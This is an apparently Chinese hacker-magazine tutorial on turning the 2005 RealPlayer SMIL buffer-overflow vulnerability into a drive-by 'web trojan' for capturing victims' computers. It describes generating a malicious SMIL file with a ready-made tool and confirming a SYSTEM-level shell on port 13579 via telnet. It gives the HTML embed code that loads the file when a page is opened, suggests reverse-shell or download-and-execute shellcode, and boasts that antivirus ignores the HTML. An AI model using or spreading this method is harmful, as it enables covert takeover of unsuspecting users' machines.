非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>，里边的抓肉鸡主要思路是在rm影音文件中插入网页木马的url链接，用户看影音文件到某个时段弹出网页木马的url。其实，利用REALPLAYER本身的漏洞，直接做成网页木马，让用户在看rm的时候直接中马是有更好的效果。因为这样一来，此漏洞利用是与IE无关了，而且打REALPLAYER补丁的人少之又少，成功率还是很高的。只要装有REALPLAYER或暴风影音支持smil格式等播放器的用户都会中招。  

    2005年3月份，REALPLAYER暴出安全漏洞，大体意思是：RealPlayer事一款媒体播放器。使用者可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析程序，这能允许一个存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统： Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 - 872) 、 Windows RealOne Player v2 (6.0.11.818 - 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 - 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从这个漏洞的描述上来看，也会明白这个网页木马的可怕之处。  

    恶意的smil文件生成器，网上有现成的代码。如图1所示，我用编译好的real.exe生成了1个1.smil文件。  
我本机装有暴风影音，打开这个1.smil，如图2所示。此时我本机就会开13579端口。netstat -an来看一下，再telnet本机13579端口试试，成功！如图3、图4所示。注意在图4中执行命令的时候，并没有回显，打完命令运行后才能看到结果的，是系统权限的。  
这个漏洞的利用方法大体就是这个样子。我们现在就是利用此漏洞来制做成网页木马，让用户打开网页后就会打开本机的13579端口。其实说白了，也就是如何在网页中调用生成的smil文件。什么是smil文件呢？也就是replayer连续播放影音文件的一种调用方法。举个简单的例子，如果想连续播放两首mp3，网页代码如下：    
★  
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">  
<PARAM NAME="_ExtentX" VALUE="9313">  
<PARAM NAME="_ExtentY" VALUE="1588">  
<PARAM NAME="AUTOSTART" VALUE="-1">  
<PARAM NAME="SHUFFLE" VALUE="0">  
<PARAM NAME="PREFETCH" VALUE="0">  
<PARAM NAME="NOLABELS" VALUE="0">  
<PARAM NAME="SRC" VALUE="Real.smil">  
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">  
<PARAM NAME="CONSOLE" VALUE="Clip">  
<PARAM NAME="LOOP" VALUE="1">  
<PARAM NAME="NUMLOOP">  
<PARAM NAME="CENTER">  
<PARAM NAME="MAINTAINASPECT" VALUE="0">  
</OBJECT>    
============================请把以上内容保存成htm或html文件  
Real.smil文件的内容：  
<smil>  
<head>  
<layout>  
<region id="oRegion" left="0" top="0" />  
</layout>  
</head>  
<body>  
<seq>  
<video region="oReal" src="001.mp3" />  
<video region="oReal" src="002.mp3" />  
</seq>  
</body>  
</smil>  
============================001.mp3和002.mp3（或其它媒体格式）与你保存的htm文件还有Real.smil

放在同一目录下  
★  
根据我以上的代码做完后，你再用网页打开你做好的htm文件就可以在网页中调用一些影音播放器播放001.mp3和002.mp3了。那有了这么多的代码与理论基础了，你会做网页木马了吗？做网页木马就简单多了，怕菜鸟还是不明白，再写一次代码吧：  
★  
===========REALPLAYER 网页木马代码开始==============================  
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">  
<PARAM NAME="_ExtentX" VALUE="9313">  
<PARAM NAME="_ExtentY" VALUE="1588">  
<PARAM NAME="AUTOSTART" VALUE="-1">  
<PARAM NAME="SHUFFLE" VALUE="0">  
<PARAM NAME="PREFETCH" VALUE="0">  
<PARAM NAME="NOLABELS" VALUE="0">  
<PARAM NAME="SRC" VALUE="你用real.exe生成的恶意smil文件的名字，如1.smil">  
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">  
<PARAM NAME="CONSOLE" VALUE="Clip">  
<PARAM NAME="LOOP" VALUE="1">  
<PARAM NAME="NUMLOOP">  
<PARAM NAME="CENTER">  
<PARAM NAME="MAINTAINASPECT" VALUE="0">  
</OBJECT>    
===========REALPLAYER 网页木马代码结束==============================  
★  
    方法就是这样简单，一个htm文件加一个恶意的smil文件就全部结束了。如果你想把网页木马改成反弹端口或下载执行exe的，那就要看你构造恶意的smil文件的shellcode水平了。我这里只是提供了一个思路，至于如何完美打造这个REALPLAYER 网页木马，大家各自研究吧。你也要可以用我的思路，利用非安全6期陈莎莎的那篇文章制作的恶意rm文件改成网页调用的方式，估计也会这功。而且，这都是正常的htm代码，杀毒软件不会去杀这段htm代码的。另外，附个小知识，REALPLAYER的网页参数：  
★  
一些REAL文件参数：  
AUTOSTART 自动播放：true|false 默认：false    
CENTER 放在中间位置 true|false 默认：false    
CONSOLE 连接多种格式 name, _master, or _unique 默认：无    
CONTROLS 播放面板的按钮和MTV、电影窗口 按钮的名字(PlayButton,PlayOnlyButton,StopButton,FFCtrl, RWCtrl,MuteCtrl,VolumeSlider,ImageWindow ) 默认：全部按钮    
HEIGHT 高度,单位是百分比或者象素,默认：0  
WIDTH 宽度,单位是百分比或者象素,默认：0  
LOOP 自动重放 true|false 默认：false    
MAINTAINASPECT 预留图象窗口. true|false 默认：false    
NOJAVA 防止JVM跳出来. no true|false 默认：false    
NOLABELS 不显示播放器的一些信息true|false 默认：false    
NOLOGO 不显示Real的LOGO true|false 默认：false //Real很霸道这句我从来没有改成过，你怎么改还是认为是 true  
NUMLOOP 指定某段片段的反复播放 any number 默认：无    
REGION 绑定SMIL区域. SMIL region 默认：无    
SHUFFLE 随机播放某段 true|false 默认：false  
SRC 文件连接地址    
BACKGROUNDCOLOR 背景颜色：颜色的英文名或者RGB数值 默认：黑色